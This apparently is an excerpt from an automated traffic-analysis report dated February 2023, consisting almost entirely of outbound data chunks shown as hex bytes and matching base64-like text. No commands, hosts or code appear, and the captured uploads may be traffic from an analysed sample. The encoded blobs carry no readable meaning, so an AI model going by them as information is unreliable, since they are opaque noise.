                                                                                                                                                                                                              Data Ascii: J27jluT5np9pYydP74FMKETjOaAlkNJwyAm/kVRVGbubnejqFgVKJSW6AQfMXP4mISrVzTvrZk78mC94X97TVlYFDxf3m/WGtsGhEkZaLOCgH9wbPPF9go4Kqr72Usy0BxBbylTGJPHhXn5xneqOPEk/ttUxGzYl7YUkh4g4ue05NLiS9gjKPq4WC6lYkLE7YYn4u3Y0EcTQnAH73WTD1hZUa2PL/Y/9plvMiAk5uhjaUZ/Pt6vTivJhtIF0M52
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11638OUTData Raw: 72 59 72 44 45 65 50 6f 5a 6c 41 75 69 66 4f 77 79 6b 71 46 6a 76 2f 51 51 61 51 4d 52 31 76 75 68 67 39 4d 7a 2b 56 53 48 6d 4b 37 45 4a 52 74 66 67 51 70 76 57 2b 6d 44 7a 42 2f 32 6c 4e 2b 68 41 53 65 6a 41 34 48 54 72 52 63 62 76 51 41 44 6d 5a 73 67 4e 39 70 70 31 35 2b 78 46 68 39 6c 59 64 52 48 59 71 32 42 45 62 37 30 74 6e 62 2b 6e 33 32 45 30 6f 74 47 59 2b 79 6e 33 42 45 7a 36 39 42 78 6e 41 44 78 53 68 4c 45 61 4c 4e 6b 6d 56 38 76 4c 73 51 38 4d 54 44 62 65 39 68 2b 6d 53 35 4b 42 43 4b 78 6b 6c 65 57 4a 38 45 56 6e 33 34 77 6f 68 69 4f 6e 70 38 77 48 30 49 6d 54 65 44 4f 4c 64 6d 75 47 71 70 6b 4f 6e 79 44 4c 52 62 53 38 70 6b 6a 45 62 48 4f 36 64 77 59 45 68 64 6d 58 6f 35 51 6a 6f 51 4c 52 37 78 35 67 43 7a 4f 32 49 4d 69 49 33 6e 43 38 6c
                                                                                                                                                                                                              Data Ascii: rYrDEePoZlAuifOwykqFjv/QQaQMR1vuhg9Mz+VSHmK7EJRtfgQpvW+mDzB/2lN+hASejA4HTrRcbvQADmZsgN9pp15+xFh9lYdRHYq2BEb70tnb+n32E0otGY+yn3BEz69BxnADxShLEaLNkmV8vLsQ8MTDbe9h+mS5KBCKxkleWJ8EVn34wohiOnp8wH0ImTeDOLdmuGqpkOnyDLRbS8pkjEbHO6dwYEhdmXo5QjoQLR7x5gCzO2IMiI3nC8l
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11654OUTData Raw: 47 44 5a 6e 72 4d 5a 4f 2b 6d 54 54 4a 73 47 41 43 30 56 42 4a 30 44 2f 56 49 61 69 57 6b 53 74 37 38 43 30 61 47 7a 2b 61 6e 57 69 45 49 52 39 74 2f 52 4c 76 67 36 58 6f 4e 4f 5a 2b 66 45 77 30 4e 4c 39 5a 34 73 52 33 6c 68 58 42 67 4a 32 45 34 6c 4b 68 6f 4e 78 41 34 53 5a 6e 6f 38 6b 61 63 57 35 75 45 4c 46 78 48 45 7a 69 68 71 35 49 31 74 54 2f 32 32 73 4c 58 77 35 7a 47 66 38 30 4f 7a 74 45 54 6d 65 77 36 70 2b 73 6e 4b 55 6a 50 68 4a 39 30 76 4d 6d 6d 6e 45 4e 63 46 2f 56 38 54 52 72 32 76 43 4c 75 72 7a 62 33 64 31 30 62 2f 4d 59 6f 5a 52 4e 4d 34 69 36 67 62 6a 66 4b 57 72 79 61 74 6f 39 4b 64 62 4c 74 70 6c 37 59 70 44 53 63 41 58 35 4d 64 59 72 56 41 62 59 34 4a 37 4e 50 6b 50 36 77 50 2f 56 42 42 70 54 62 46 73 62 61 44 58 37 62 59 37 42 6a 47
                                                                                                                                                                                                              Data Ascii: GDZnrMZO+mTTJsGAC0VBJ0D/VIaiWkSt78C0aGz+anWiEIR9t/RLvg6XoNOZ+fEw0NL9Z4sR3lhXBgJ2E4lKhoNxA4SZno8kacW5uELFxHEzihq5I1tT/22sLXw5zGf80OztETmew6p+snKUjPhJ90vMmmnENcF/V8TRr2vCLurzb3d10b/MYoZRNM4i6gbjfKWryato9KdbLtpl7YpDScAX5MdYrVAbY4J7NPkP6wP/VBBpTbFsbaDX7bY7BjG
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11670OUTData Raw: 50 7a 4c 51 41 31 74 47 38 56 79 32 2f 61 76 4a 5a 48 6f 73 39 66 74 2f 76 77 7a 2f 63 70 79 69 78 53 77 51 46 44 71 33 61 6e 48 62 6d 39 63 2b 70 76 62 38 77 63 4a 6e 52 64 77 4c 34 57 36 55 78 62 2f 4f 41 57 37 4e 48 35 73 45 68 38 53 7a 79 4f 2b 33 31 39 49 69 35 61 35 37 4c 4c 73 6f 6e 71 71 43 34 53 4b 78 76 63 6d 66 74 56 70 51 59 50 58 52 75 6b 72 64 64 41 53 57 63 4d 4a 45 6c 4e 6a 7a 78 50 51 6b 37 78 70 39 47 4b 7a 6b 4e 54 6a 2b 76 42 43 46 4c 72 63 48 4d 49 6b 30 56 69 7a 33 32 55 33 71 43 74 5a 36 6f 38 6a 4c 76 77 59 53 6f 37 6f 78 36 68 57 33 78 34 41 32 72 79 63 32 78 6f 6f 38 49 58 53 73 59 4f 42 45 4f 4a 38 74 4e 4b 48 75 6b 2f 62 70 45 4e 75 78 6d 6c 69 51 77 45 77 51 31 4d 43 33 63 76 76 71 71 67 66 6f 4b 4e 41 70 6b 68 4e 49 77 55 6b
                                                                                                                                                                                                              Data Ascii: PzLQA1tG8Vy2/avJZHos9ft/vwz/cpyixSwQFDq3anHbm9c+pvb8wcJnRdwL4W6Uxb/OAW7NH5sEh8SzyO+319Ii5a57LLsonqqC4SKxvcmftVpQYPXRukrddASWcMJElNjzxPQk7xp9GKzkNTj+vBCFLrcHMIk0Viz32U3qCtZ6o8jLvwYSo7ox6hW3x4A2ryc2xoo8IXSsYOBEOJ8tNKHuk/bpENuxmliQwEwQ1MC3cvvqqgfoKNApkhNIwUk
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11686OUTData Raw: 77 62 6e 6a 70 66 31 79 6d 62 67 50 54 2f 36 71 36 38 42 79 54 44 31 50 57 39 6f 53 4f 61 33 78 6c 48 78 39 50 46 51 37 57 54 67 2f 68 77 4d 2f 35 59 38 68 37 46 37 47 34 71 45 70 67 6a 4b 52 43 64 56 33 51 53 59 49 42 5a 37 6d 6b 62 52 49 66 6e 6c 63 2f 53 74 4c 38 46 7a 45 71 4d 79 41 37 6a 6c 66 69 46 50 43 65 71 50 74 48 49 6f 69 62 71 75 53 6f 57 45 4a 58 4f 45 72 45 75 2b 6a 30 4c 6a 48 72 56 34 30 54 42 61 52 51 70 75 47 6d 51 46 48 6e 54 51 6f 73 68 30 33 55 38 4b 33 79 77 64 61 75 2b 36 70 4b 44 67 38 50 72 43 73 6b 69 6e 79 32 70 47 55 72 71 37 77 61 35 62 70 41 46 44 30 54 73 71 30 45 4b 4a 64 2f 48 61 62 4f 77 4e 33 56 30 7a 66 6e 43 46 70 39 45 68 7a 76 6e 32 41 72 6d 54 6e 66 78 54 55 4a 55 61 37 69 77 42 6c 4e 57 56 48 54 47 71 62 6c 43 50
                                                                                                                                                                                                              Data Ascii: wbnjpf1ymbgPT/6q68ByTD1PW9oSOa3xlHx9PFQ7WTg/hwM/5Y8h7F7G4qEpgjKRCdV3QSYIBZ7mkbRIfnlc/StL8FzEqMyA7jlfiFPCeqPtHIoibquSoWEJXOErEu+j0LjHrV40TBaRQpuGmQFHnTQosh03U8K3ywdau+6pKDg8PrCskiny2pGUrq7wa5bpAFD0Tsq0EKJd/HabOwN3V0zfnCFp9Ehzvn2ArmTnfxTUJUa7iwBlNWVHTGqblCP
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11702OUTData Raw: 7a 42 79 56 66 41 45 32 36 45 6e 52 46 38 4e 6f 4f 45 2b 69 48 4d 5a 73 79 65 47 66 42 34 51 4d 70 48 38 38 78 68 72 2b 6c 34 4b 76 65 44 33 65 6c 43 41 72 4d 59 6b 68 2f 31 44 47 62 55 68 5a 51 75 65 4e 34 6f 45 6f 58 35 74 48 4f 48 71 62 30 4f 4f 4d 51 67 2b 6a 78 39 6b 67 4a 69 30 78 2f 69 61 62 76 72 68 72 67 78 4b 5a 64 6b 5a 6d 62 59 58 79 63 4e 61 55 2f 47 43 5a 4b 72 31 66 54 55 31 64 32 50 6a 45 36 46 4d 53 6d 34 65 42 74 42 44 44 39 4b 73 74 49 6d 5a 6f 46 4e 63 47 2b 2f 32 4a 31 6e 61 75 56 64 30 63 67 4e 4f 79 4d 57 67 75 52 55 7a 77 51 59 2b 68 36 48 49 56 6e 37 2f 59 48 30 33 56 64 75 37 37 38 66 54 43 38 7a 4f 73 74 2b 61 46 5a 5a 50 54 4e 2f 66 71 4f 65 67 33 61 71 4e 2f 74 72 4b 48 4b 49 75 46 59 6f 53 62 2b 46 67 31 46 54 55 48 75 35 6c
                                                                                                                                                                                                              Data Ascii: zByVfAE26EnRF8NoOE+iHMZsyeGfB4QMpH88xhr+l4KveD3elCArMYkh/1DGbUhZQueN4oEoX5tHOHqb0OOMQg+jx9kgJi0x/iabvrhrgxKZdkZmbYXycNaU/GCZKr1fTU1d2PjE6FMSm4eBtBDD9KstImZoFNcG+/2J1nauVd0cgNOyMWguRUzwQY+h6HIVn7/YH03Vdu778fTC8zOst+aFZZPTN/fqOeg3aqN/trKHKIuFYoSb+Fg1FTUHu5l
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11718OUTData Raw: 41 4c 57 47 38 53 6d 34 77 71 48 74 4c 65 67 2b 39 56 7a 6f 4d 58 77 35 52 6a 63 30 4a 4a 30 52 4b 68 43 39 45 77 4d 67 35 66 42 54 5a 65 56 65 68 39 42 73 75 6b 54 41 6d 4c 7a 4f 66 57 51 64 41 45 48 54 69 52 57 61 43 39 56 37 32 56 35 31 6f 66 62 6e 65 6f 78 63 59 32 2b 73 2b 61 35 34 47 67 49 7a 39 59 6e 70 46 41 71 2b 68 77 41 76 69 68 65 79 33 4c 4a 56 79 48 2f 76 69 49 79 4f 55 68 66 4e 77 35 6b 7a 63 69 63 37 69 36 71 61 63 65 42 4a 55 35 69 33 7a 71 43 6c 6c 78 63 49 59 36 42 53 70 44 4e 75 53 48 69 66 4c 32 49 48 65 56 4f 6a 56 53 30 5a 69 59 54 6c 32 54 53 6f 55 37 58 69 38 6d 5a 69 6c 39 46 72 59 77 39 46 75 72 78 71 45 32 6d 46 52 53 2b 70 63 57 49 54 34 33 63 32 68 42 5a 79 72 6e 51 75 66 48 64 32 42 73 59 7a 54 33 32 54 72 43 62 76 77 6f 36
                                                                                                                                                                                                              Data Ascii: ALWG8Sm4wqHtLeg+9VzoMXw5Rjc0JJ0RKhC9EwMg5fBTZeVeh9BsukTAmLzOfWQdAEHTiRWaC9V72V51ofbneoxcY2+s+a54GgIz9YnpFAq+hwAvihey3LJVyH/viIyOUhfNw5kzcic7i6qaceBJU5i3zqCllxcIY6BSpDNuSHifL2IHeVOjVS0ZiYTl2TSoU7Xi8mZil9FrYw9FurxqE2mFRS+pcWIT43c2hBZyrnQufHd2BsYzT32TrCbvwo6
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11734OUTData Raw: 75 76 45 2b 37 71 76 71 6b 4c 6d 4f 51 54 47 6c 73 70 65 71 57 74 66 52 45 6c 73 5a 36 6d 7a 76 31 4c 51 77 47 42 4e 71 76 67 34 30 63 54 6e 49 30 51 76 48 53 56 67 51 65 53 61 63 6e 33 44 35 76 77 69 61 62 30 53 74 39 4e 37 53 6b 64 54 6b 43 66 78 2b 4b 6f 66 51 67 39 38 41 78 54 73 70 4c 31 71 35 58 45 39 52 50 30 30 75 55 56 31 32 43 75 76 63 39 58 65 6b 59 75 2f 42 4b 62 44 58 73 55 65 71 7a 4b 57 35 2b 44 62 4b 65 56 65 6f 46 4a 43 68 75 51 56 6d 75 44 76 47 55 50 59 51 30 53 4f 2f 59 44 2f 44 41 69 6c 75 5a 6a 53 63 55 52 4c 79 4c 73 37 43 33 47 71 41 36 37 50 34 53 75 6b 79 4a 6c 32 71 38 6e 5a 4e 38 55 59 66 76 6f 47 4f 42 73 65 58 48 41 45 64 4c 45 56 45 38 71 5a 56 35 5a 35 33 63 53 69 4d 77 31 67 72 59 4b 71 6d 49 4d 71 34 74 4d 39 6b 37 33 4a
                                                                                                                                                                                                              Data Ascii: uvE+7qvqkLmOQTGlspeqWtfRElsZ6mzv1LQwGBNqvg40cTnI0QvHSVgQeSacn3D5vwiab0St9N7SkdTkCfx+KofQg98AxTspL1q5XE9RP00uUV12Cuvc9XekYu/BKbDXsUeqzKW5+DbKeVeoFJChuQVmuDvGUPYQ0SO/YD/DAiluZjScURLyLs7C3GqA67P4SukyJl2q8nZN8UYfvoGOBseXHAEdLEVE8qZV5Z53cSiMw1grYKqmIMq4tM9k73J
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11750OUTData Raw: 57 38 59 41 61 71 43 38 76 68 4c 47 6d 6c 4f 74 38 57 66 35 41 37 2b 44 70 6c 69 44 38 47 77 79 37 72 2f 6c 4d 39 52 4b 78 77 4d 54 30 57 4a 42 4d 58 6b 4b 7a 64 6c 41 37 67 39 66 76 4b 48 71 4a 33 46 51 66 49 67 6f 56 42 61 77 56 6e 6b 41 61 46 57 4e 68 56 4e 61 4d 37 6a 4b 6a 51 44 58 32 32 4c 70 39 39 41 4c 6a 49 67 45 7a 6c 6f 68 55 74 33 43 59 75 69 52 43 4d 58 5a 67 47 48 5a 4d 4f 45 66 46 59 6b 59 6b 75 6f 70 44 4c 30 5a 6c 63 69 65 64 56 79 4d 71 77 33 43 4e 45 48 4a 76 54 75 47 76 4a 4a 78 2b 31 72 59 69 37 37 38 76 61 76 4e 49 71 54 70 44 79 6a 59 59 36 33 58 35 33 77 30 4c 42 71 45 42 6c 72 43 55 6e 51 67 2f 6b 55 53 41 74 37 79 6c 5a 48 36 67 51 4c 46 36 36 77 30 75 4d 56 72 32 37 7a 39 37 48 6b 30 4c 55 58 69 31 78 65 33 34 35 2f 48 5a 66 45
                                                                                                                                                                                                              Data Ascii: W8YAaqC8vhLGmlOt8Wf5A7+DpliD8Gwy7r/lM9RKxwMT0WJBMXkKzdlA7g9fvKHqJ3FQfIgoVBawVnkAaFWNhVNaM7jKjQDX22Lp99ALjIgEzlohUt3CYuiRCMXZgGHZMOEfFYkYkuopDL0ZlciedVyMqw3CNEHJvTuGvJJx+1rYi778vavNIqTpDyjYY63X53w0LBqEBlrCUnQg/kUSAt7ylZH6gQLF66w0uMVr27z97Hk0LUXi1xe345/HZfE
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11766OUTData Raw: 30 30 74 6a 6f 73 32 4d 76 69 36 46 70 68 78 53 72 6d 65 67 61 75 61 71 75 52 64 6e 52 69 42 4b 31 4b 56 73 44 63 4e 51 34 67 67 58 70 64 37 38 58 4d 34 34 4b 41 42 62 62 72 49 34 36 51 4c 75 68 46 72 5a 31 57 50 79 50 39 55 73 4d 47 37 61 4c 54 6d 32 73 49 34 75 77 35 33 70 58 7a 6f 45 53 61 78 52 76 34 77 4a 59 48 36 77 64 6b 44 55 33 6f 6c 61 66 2f 44 34 79 2b 54 2b 4f 51 5a 32 30 36 61 6d 35 52 47 44 35 56 63 37 63 53 54 2f 75 43 45 4f 78 54 33 62 4e 44 51 70 74 35 68 53 39 37 78 4d 38 4e 61 61 61 43 45 51 66 34 45 48 41 39 66 46 62 6b 43 65 43 76 44 6c 37 62 42 73 38 6e 37 54 5a 62 51 6f 46 50 31 6c 61 68 73 59 6b 51 79 34 67 6f 48 79 6e 55 57 44 33 39 52 5a 2f 65 71 75 2b 39 2f 59 39 46 49 55 49 45 2f 55 78 43 2b 6c 78 4a 46 4e 55 6d 78 4a 63 35 79
                                                                                                                                                                                                              Data Ascii: 00tjos2Mvi6FphxSrmegauaquRdnRiBK1KVsDcNQ4ggXpd78XM44KABbbrI46QLuhFrZ1WPyP9UsMG7aLTm2sI4uw53pXzoESaxRv4wJYH6wdkDU3olaf/D4y+T+OQZ206am5RGD5Vc7cST/uCEOxT3bNDQpt5hS97xM8NaaaCEQf4EHA9fFbkCeCvDl7bBs8n7TZbQoFP1lahsYkQy4goHynUWD39RZ/equ+9/Y9FIUIE/UxC+lxJFNUmxJc5y
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11782OUTData Raw: 57 41 59 47 42 41 44 75 79 65 5a 41 45 6f 4d 70 37 51 71 6f 6c 30 6c 70 50 6d 45 39 51 54 45 5a 71 59 66 72 68 6d 76 70 34 6f 45 6c 59 59 7a 77 37 55 76 46 65 4c 39 4a 49 31 58 42 79 73 63 68 70 37 32 59 44 49 46 4b 58 7a 50 6a 6f 6b 59 57 47 4a 52 7a 71 6d 43 61 41 64 63 67 31 33 44 6c 2f 7a 6a 43 6c 46 6b 53 68 72 6e 51 77 72 71 41 61 4b 51 30 6b 38 6a 77 42 45 7a 36 67 6e 67 46 4c 64 31 66 48 64 37 71 59 64 39 6a 4b 58 6b 74 54 47 50 61 4e 2b 52 70 6c 58 2f 42 34 34 5a 6c 4c 4e 7a 45 62 6f 42 33 45 79 7a 42 4b 37 33 55 66 48 39 4b 6a 62 4b 4a 44 7a 54 76 54 50 4c 30 7a 55 6c 52 52 42 31 75 66 4d 2f 36 44 74 31 79 66 4c 35 45 2f 54 46 46 57 41 30 49 79 33 2b 6f 56 4c 4e 2f 76 7a 39 71 70 64 46 79 51 52 53 58 49 63 35 64 77 65 69 70 55 33 32 6f 4d 6d 49
                                                                                                                                                                                                              Data Ascii: WAYGBADuyeZAEoMp7Qqol0lpPmE9QTEZqYfrhmvp4oElYYzw7UvFeL9JI1XByschp72YDIFKXzPjokYWGJRzqmCaAdcg13Dl/zjClFkShrnQwrqAaKQ0k8jwBEz6gngFLd1fHd7qYd9jKXktTGPaN+RplX/B44ZlLNzEboB3EyzBK73UfH9KjbKJDzTvTPL0zUlRRB1ufM/6Dt1yfL5E/TFFWA0Iy3+oVLN/vz9qpdFyQRSXIc5dweipU32oMmI
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11798OUTData Raw: 77 49 34 43 49 50 53 55 2b 65 4b 6a 53 65 61 4d 44 49 75 47 4b 39 6c 4c 44 5a 30 58 6a 55 4d 50 65 47 32 32 55 6e 69 6b 6b 66 6a 36 34 58 46 73 49 4f 6b 67 4f 79 35 6a 66 62 37 64 4a 49 4e 49 6d 58 56 6b 72 48 4b 66 77 39 66 63 78 45 49 4c 46 47 61 51 5a 52 36 4c 53 7a 4b 30 4e 41 76 2f 50 4e 48 37 42 64 67 79 6a 4d 63 52 56 33 6d 41 63 62 53 6e 71 35 79 45 43 4b 61 43 2b 5a 50 2b 73 52 46 38 65 58 64 73 72 50 51 69 69 72 67 59 57 4a 41 6d 78 62 72 42 50 55 4b 34 6f 74 33 2f 65 4b 77 46 58 52 56 32 68 36 61 69 49 51 30 32 39 46 76 4b 68 77 41 46 42 67 6a 53 6a 34 4d 34 51 30 62 59 38 2f 34 35 4f 30 31 66 6a 6b 68 38 44 32 54 4c 42 34 48 65 63 32 30 59 68 36 56 77 47 6b 49 6a 62 74 4f 76 43 79 72 57 49 45 65 63 73 6c 6c 2f 4f 76 6b 37 5a 46 68 6e 53 5a 65
                                                                                                                                                                                                              Data Ascii: wI4CIPSU+eKjSeaMDIuGK9lLDZ0XjUMPeG22Unikkfj64XFsIOkgOy5jfb7dJINImXVkrHKfw9fcxEILFGaQZR6LSzK0NAv/PNH7BdgyjMcRV3mAcbSnq5yECKaC+ZP+sRF8eXdsrPQiirgYWJAmxbrBPUK4ot3/eKwFXRV2h6aiIQ029FvKhwAFBgjSj4M4Q0bY8/45O01fjkh8D2TLB4Hec20Yh6VwGkIjbtOvCyrWIEecsll/Ovk7ZFhnSZe
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11814OUTData Raw: 61 62 38 69 38 65 73 5a 63 65 55 66 41 68 71 30 77 4b 38 36 4d 79 36 53 2b 75 75 74 54 63 61 72 48 47 55 67 47 4d 70 49 44 45 30 42 44 55 6b 41 36 47 45 67 79 72 72 6d 76 6c 49 71 6b 67 61 68 4b 54 2f 6f 75 4e 36 63 6e 46 48 69 31 6a 49 66 45 37 6a 2f 44 4f 78 59 66 41 51 4f 77 4e 7a 32 51 31 4a 4f 76 73 49 31 71 73 74 51 74 65 50 41 45 38 78 63 57 38 70 4a 46 33 64 35 42 54 38 65 57 30 43 74 4f 58 55 65 63 71 6c 6c 75 34 7a 4f 48 34 78 31 74 4c 44 57 49 52 35 57 52 51 32 59 77 4f 33 51 2b 36 64 6a 7a 63 33 31 53 56 59 6d 70 44 69 45 68 73 72 6f 35 62 73 46 57 75 48 53 57 34 41 70 70 4c 2f 6c 4e 4b 62 30 43 4a 73 61 36 56 42 54 38 4e 38 36 55 49 58 71 42 59 62 4d 59 73 49 76 4b 6d 7a 67 37 45 2b 44 46 6b 41 57 69 51 70 56 4d 59 33 4e 4d 47 71 2b 43 38 64
                                                                                                                                                                                                              Data Ascii: ab8i8esZceUfAhq0wK86My6S+uutTcarHGUgGMpIDE0BDUkA6GEgyrrmvlIqkgahKT/ouN6cnFHi1jIfE7j/DOxYfAQOwNz2Q1JOvsI1qstQtePAE8xcW8pJF3d5BT8eW0CtOXUecqllu4zOH4x1tLDWIR5WRQ2YwO3Q+6djzc31SVYmpDiEhsro5bsFWuHSW4AppL/lNKb0CJsa6VBT8N86UIXqBYbMYsIvKmzg7E+DFkAWiQpVMY3NMGq+C8d
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11830OUTData Raw: 68 4a 32 43 43 59 48 5a 6b 61 4e 33 70 5a 62 70 49 75 38 34 57 49 51 66 30 78 53 52 48 43 62 76 58 33 6d 44 6b 71 61 6b 34 71 63 7a 75 58 69 54 31 63 6a 2b 41 52 6b 45 75 68 69 7a 65 32 6e 78 70 52 42 72 2f 43 4b 65 51 76 66 6b 67 6c 6a 36 70 63 68 4a 63 58 45 4f 56 49 4a 67 31 6c 63 52 72 46 6e 59 47 56 41 58 57 75 49 31 77 50 2f 2f 6d 2f 32 72 71 75 65 38 65 4a 41 38 62 44 76 66 57 34 51 68 4b 46 33 6e 6c 64 46 61 76 79 57 2b 36 54 66 50 78 44 4a 47 38 45 77 51 5a 59 70 62 39 73 35 51 6b 69 49 51 4e 39 4f 78 39 66 44 53 7a 4c 42 74 43 31 61 35 31 59 46 55 2b 77 75 6a 4b 4e 76 79 5a 2b 63 63 30 62 4f 56 4d 30 63 45 44 70 74 56 37 66 68 4d 63 33 39 49 66 57 2f 44 4d 36 6f 47 2b 70 57 64 4c 6a 69 72 4f 2f 54 4a 6c 49 32 64 39 45 71 4f 72 73 6e 71 77 58 2b
                                                                                                                                                                                                              Data Ascii: hJ2CCYHZkaN3pZbpIu84WIQf0xSRHCbvX3mDkqak4qczuXiT1cj+ARkEuhize2nxpRBr/CKeQvfkglj6pchJcXEOVIJg1lcRrFnYGVAXWuI1wP//m/2rque8eJA8bDvfW4QhKF3nldFavyW+6TfPxDJG8EwQZYpb9s5QkiIQN9Ox9fDSzLBtC1a51YFU+wujKNvyZ+cc0bOVM0cEDptV7fhMc39IfW/DM6oG+pWdLjirO/TJlI2d9EqOrsnqwX+
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11846OUTData Raw: 51 47 49 79 52 56 4d 78 6a 66 57 44 6b 68 78 48 6c 30 37 43 49 6e 61 6b 53 50 77 35 4b 76 64 2f 57 51 63 7a 75 4e 68 55 47 54 53 59 69 33 6d 6d 74 52 49 71 42 63 5a 67 30 65 38 56 6e 44 53 43 73 66 39 6f 71 2b 62 4c 69 45 71 38 57 42 4e 44 62 65 46 48 6b 33 67 46 78 42 6e 6b 34 38 43 72 49 38 50 4f 4e 4a 71 71 63 66 2f 43 48 76 57 67 39 73 43 45 63 53 4d 35 48 35 68 53 70 39 6d 70 68 58 66 36 79 2b 50 51 67 6a 52 51 56 34 33 41 56 6d 72 6b 33 6c 58 58 78 38 6c 69 7a 68 6c 65 67 59 31 46 7a 78 34 45 30 44 37 4a 51 6a 6c 47 6b 52 67 32 61 37 34 58 30 52 63 58 41 71 78 62 69 4c 4a 79 39 31 55 77 31 7a 59 43 62 35 4f 48 6d 7a 56 2b 56 38 45 2f 39 62 35 55 77 61 67 52 73 43 50 7a 4a 7a 48 6c 6f 34 47 72 4b 38 2b 2b 6f 58 63 46 59 6e 31 66 4f 48 4c 42 76 6b 45
                                                                                                                                                                                                              Data Ascii: QGIyRVMxjfWDkhxHl07CInakSPw5Kvd/WQczuNhUGTSYi3mmtRIqBcZg0e8VnDSCsf9oq+bLiEq8WBNDbeFHk3gFxBnk48CrI8PONJqqcf/CHvWg9sCEcSM5H5hSp9mphXf6y+PQgjRQV43AVmrk3lXXx8lizhlegY1Fzx4E0D7JQjlGkRg2a74X0RcXAqxbiLJy91Uw1zYCb5OHmzV+V8E/9b5UwagRsCPzJzHlo4GrK8++oXcFYn1fOHLBvkE
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11862OUTData Raw: 65 6e 66 64 4c 46 61 73 43 38 64 42 30 61 5a 38 70 55 31 46 76 46 54 52 73 6f 41 2b 4b 39 41 49 4c 65 70 63 76 47 54 55 78 6f 2f 33 41 72 4b 6c 46 5a 56 44 47 66 62 4a 49 45 41 66 30 53 31 74 41 53 41 57 6a 6b 50 55 53 38 58 2f 62 33 37 64 64 45 57 57 74 33 2f 5a 69 58 57 70 77 58 66 62 52 47 4f 77 77 67 73 5a 66 2b 76 46 79 36 7a 6e 74 6a 4a 44 35 46 61 37 30 39 45 68 73 38 6c 57 32 57 54 5a 6a 30 63 36 2b 50 65 46 69 78 71 68 46 48 61 57 6c 47 31 44 66 32 56 5a 38 30 34 6f 64 78 42 39 51 4d 54 69 5a 47 2b 6d 6d 41 57 72 34 6c 7a 73 73 53 4b 59 51 52 38 4d 4c 66 41 2f 6b 48 79 4c 44 42 59 4b 48 33 70 6b 35 49 75 79 49 67 45 50 2b 56 61 4a 6b 6f 6d 6a 74 59 6a 54 33 47 7a 2b 2f 61 32 68 62 48 4b 56 46 78 4f 63 71 49 55 47 71 31 65 75 78 75 55 6c 6a 2f 65
                                                                                                                                                                                                              Data Ascii: enfdLFasC8dB0aZ8pU1FvFTRsoA+K9AILepcvGTUxo/3ArKlFZVDGfbJIEAf0S1tASAWjkPUS8X/b37ddEWWt3/ZiXWpwXfbRGOwwgsZf+vFy6zntjJD5Fa709Ehs8lW2WTZj0c6+PeFixqhFHaWlG1Df2VZ804odxB9QMTiZG+mmAWr4lzssSKYQR8MLfA/kHyLDBYKH3pk5IuyIgEP+VaJkomjtYjT3Gz+/a2hbHKVFxOcqIUGq1euxuUlj/e
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11878OUTData Raw: 42 71 68 50 32 59 70 76 43 4a 66 59 4c 31 59 2b 73 37 64 37 49 32 33 51 53 4b 32 76 38 69 73 6e 6d 68 6d 39 42 4d 61 53 72 30 36 54 66 5a 7a 4b 71 4f 36 57 57 43 55 74 78 4b 44 38 72 63 76 4e 31 36 69 65 42 61 47 69 77 71 70 36 42 4b 51 52 69 73 46 4f 58 6b 48 59 49 33 49 6e 55 32 38 6a 4d 62 30 4c 6c 48 50 72 6d 42 66 75 62 47 6a 51 72 66 4b 66 6b 56 51 4f 51 68 4a 47 79 6a 38 77 78 78 4a 74 69 64 70 77 72 67 44 62 6c 41 6d 4c 44 6a 6b 2b 41 63 37 6a 35 70 31 36 46 53 4f 74 62 67 4c 47 71 6b 69 4d 70 64 63 59 30 6a 33 43 77 41 69 32 4a 49 61 4e 58 51 5a 4f 62 57 61 6d 4a 4c 32 43 34 58 73 45 6e 4b 4d 50 35 61 6a 62 34 64 79 67 79 64 47 67 63 66 43 7a 48 34 6d 57 4d 68 45 75 71 35 6d 74 6f 6a 64 46 74 6b 63 6f 39 37 6b 4b 61 33 77 4e 31 31 66 73 6e 53 4d
                                                                                                                                                                                                              Data Ascii: BqhP2YpvCJfYL1Y+s7d7I23QSK2v8isnmhm9BMaSr06TfZzKqO6WWCUtxKD8rcvN16ieBaGiwqp6BKQRisFOXkHYI3InU28jMb0LlHPrmBfubGjQrfKfkVQOQhJGyj8wxxJtidpwrgDblAmLDjk+Ac7j5p16FSOtbgLGqkiMpdcY0j3CwAi2JIaNXQZObWamJL2C4XsEnKMP5ajb4dygydGgcfCzH4mWMhEuq5mtojdFtkco97kKa3wN11fsnSM
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC11894OUTData Raw: 73 72 78 67 4d 57 43 77 37 4f 74 57 50 6e 45 63 6d 6e 51 52 42 46 43 72 6d 76 6e 4a 52 2f 43 6b 55 58 77 6b 53 52 36 4c 71 36 30 6f 4d 56 6d 2f 79 73 35 7a 49 31 69 41 59 4d 4a 46 6a 7a 69 52 51 72 33 59 67 4a 41 4e 79 61 63 6e 4a 51 36 6c 54 41 67 39 6c 45 53 39 6c 51 70 65 55 79 65 39 37 6a 38 4c 38 62 57 45 74 66 57 48 35 2b 79 59 66 4d 65 61 74 73 71 53 79 4a 56 71 48 70 37 47 4f 4f 46 34 37 71 4c 73 45 77 54 4f 59 4d 6b 37 49 6d 4c 6f 6d 66 31 7a 69 61 36 38 59 2b 57 31 6f 6f 4e 64 44 4c 47 47 76 64 44 66 4d 2f 5a 55 42 69 67 55 45 57 73 61 71 79 56 31 37 4a 64 39 6a 7a 46 58 79 51 79 72 55 70 49 33 2b 69 39 49 73 2f 78 31 67 55 2b 44 6b 77 73 31 6d 79 75 34 53 37 34 67 75 76 4f 4f 46 76 4b 79 6d 71 66 51 2b 51 33 77 65 6e 77 71 44 44 47 34 46 34 49
